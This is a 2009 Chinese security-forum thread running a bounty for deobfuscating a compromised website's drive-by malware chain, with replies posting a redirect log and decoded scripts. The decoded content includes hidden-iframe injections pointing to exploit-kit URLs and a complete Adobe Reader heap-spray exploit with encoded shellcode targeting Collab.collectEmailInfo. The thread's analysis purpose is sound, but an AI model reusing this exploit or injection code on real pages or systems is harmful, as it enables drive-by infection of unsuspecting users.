[解密悬赏][第26期][20]

qianwenxiang

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志，如果没有，请发出具体解密过程
4、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
5、锁定后，会重新修改本次的解密地址，并且开帖！
6、为了体现悬赏帖宗旨，昨日解密成功者再次解出今天网址的只能得到对应网址70%经验



解密地址（替换HXXP为HTTP）：


hxxp://tri-visionhomes.com/ （完成 by cchao21 @ 8L）

一次解完（包含解密步骤）=20分
分步（即未解完情况）：3+3+3+5+6


     
注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.8（中文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://bbs.kafan.cn/thread-408295-1-1.html


(时限=1天)

[ 本帖最后由 qianwenxiang 于 2009-2-22 22:14 编辑 ]

qianwenxiang

话说最后一步不会解……

knifed

忽悠了吧.

zzh161

又在骗人了

qianwenxiang

不不。。今天运气不好。。我去直取弯直接绕到弯路去了。。

knifed

.老是跳转.一会就是404.

qigang

国外站点质量就是高。

cchao21

Log is generated by FreShow.
[wide]http://tri-visionhomes.com/
    [frame]http://reddii.ru/traffic/sploit1/?'+Math.round(Math.random()*313277)+'xtdbVVVaYd
        [frame]http://reddii.ru/traffic/sploit1/getfile.php?f=pdf
    [frame]http://reddii.ru/traffic/sploit1/?'+Math.round(Math.random()*313277)+'xtdbVVVaYd
        [object]http://reddii.ru/traffic/sploit1/getexe.php
        [frame]http://reddii.ru/traffic/sploit1/getfile.php?f=pdf
    [frame]http://webcom-software.com/images/?

wsboy

解得
<SCRIPT>window.status='Done';document.write('<iframe  id="YYbxYxYbVb" name="YttbxtYxay" src="http://reddii.ru/traffic/sploit1/?'+Math.round(Math.random()*313277)+'xtdbVVVaYd" width="523" height="599" style="display: none;"></iframe>')</SCRIPT>
http://reddii.ru/traffic/sploit1/?
解得
hxxp://reddii.ru/traffic/sploit1/getfile.php?f=pdf
解得
var laput=new Array();function rusuli(vesevas,voledokam){while(vesevas.length*2<voledokam){vesevas+=vesevas;}vesevas=vesevas.substring(0,voledokam/2);return vesevas;}function ladibine(){var vosotevaf9=0x0c0c0c0c;var bipedov=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u454c%u444c%u4343%u4c49%u3648%u4b49%u334e%u5041%u4842%u3346%u504c%u3949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u3742%u444e%u5949%u4949%u5949%u4c43%u4f4d%u334a%u4a49%u4949%u3949%u4949%u5144%u4d49%u5945%u5144%u4e49%u5845%u4346%u5144%u4d49%u4941%u4144%u4441%u5144%u4e4c%u4a45%u3144%u4e4d%u4847%u4e41%u394c%u464c%u4144%u4e47%u4b49%u494c%u3644%u5144%u4d47%u384d%u4a4c%u4746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u4644%u4144%u564b%u4f43%u3947%u4c42%u564c%u434f%u4e4d%u4941%u4c42%u4c48%u514c%u4550%u494d%u4d4e%u474b%u4742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u594c%u554c%u544a%u574a%u494c%u354a%u4a4c%u4542%u4f4f%u3144%u4941%u5144%u4d4f%u5845%u594c%u554c%u554a%u574a%u494b%u394c%u354a%u5144%u3949%u394c%u554c%u3144%u4643%u4144%u3650%u314c%u354f%u4947%u3144%u5449%u4f43%u394d%u4c42%u5741%u4c49%u3949%u5949%u5949%u414c%u554f%u5946%u4c4b%u4c4f%u5648%u4c50%u5645%u4c43%u4144%u4441%u4f43%u394a%u4c42%u3741%u4a46%u3949%u4949%u5949%u514c%u354f%u384c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u4149%u4c47%u514c%u4745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u3648%u4c50%u3745%u4550%u494d%u394c%u4c45%u4f4a%u4b47%u4f4e%u5550%u4d4d%u594c%u494d%u4e41%u4f4e%u5949%u3949%u4a4c%u5549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u5648%u4c50%u4645%u4144%u4445%u4c49%u4c4c%u3648%u4c50%u4649%u4c49%u5648%u4c50%u364d%u4a4c%u3549%u3345%u314e%u4549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u4648%u344b%u4c43%u4c42%u4344%u574b%u4747%u4a4c%u5549%u554c%u3741%u4b4f%u3648%u3648%u5648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u4949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u3949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u3949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u3949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u4949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u4949%u364a%u3746%u5746%u3742%u334c%u424f%u424f%u4744%u5645%u3646%u4646%u4649%u4649%u5250%u4744%u3745%u324f%u5746%u4744%u4641%u3648%u5648%u3649%u4643%u424f%u5743%u4742%u364e%u564f%u3649%u4746%u3341%u424f%u5647%u5645%u5746%u5645%u574a%u5645%u3250%u5742%u364a%u4742%u334f%u464a%u334d%u5343%u3341%u5842%u005a");var momuluke=0x400000;var didefo=bipedov.length*2;var voledokam=momuluke-(didefo+0x38);var vesevas=unescape("%u9090%u9090");vesevas=rusuli(vesevas,voledokam);var fiduv=(vosotevaf9-0x400000)/momuluke;for(var nopumupuke=0;nopumupuke<fiduv;nopumupuke++){laput[nopumupuke]=vesevas+bipedov;}}function pusunusata(){var super=app.viewerVersion.toString();super=super.replace(/\D/g,'');var lotakebil=new Array(super.charAt(0),super.charAt(1),super.charAt(2));if((lotakebil[0]==8&&((lotakebil[1]==1&&lotakebil[2]<2)||lotakebil[1]<1))||(lotakebil[0]==7&&lotakebil[1]<1)||(lotakebil[0]<7)){ladibine();var burepafofa2=unescape("%u0c0c%u0c0c");while(burepafofa2.length<44952)burepafofa2+=burepafofa2;this.collabStore=Collab.collectEmailInfo({subj: "",msg: burepafofa2});}}pusunusata();

<script>if(!myia){document.write(unescape( <iframe name=c8 src='http://webcom-software.com/images/?'+Math.round(Math.random()*54932)+'3fccc6ccfd' width=443 height=124 style='display: none'></iframe>'));}var myia=true;</script>
hxxp://webcom-software.com/images/?
解得
<body><iframe src='http://tds4self.com/sutra/in.cgi?2' width='0' height='0' style='visibility: hidden' scrolling='no' framespacing='0' frameborder='no'></iframe>Waiting...</body>
http://tds4self.com/sutra/in.cgi?2
重定向
hxxp://tds4self.com/sutra/default.cgi

[ 本帖最后由 wsboy 于 2009-2-22 23:45 编辑 ]

cchao21

hxxp://reddii.ru/traffic/sploit1/getfile.php?f=pdf下载得到getfile.php文件本人机上无法解下去，一直出错。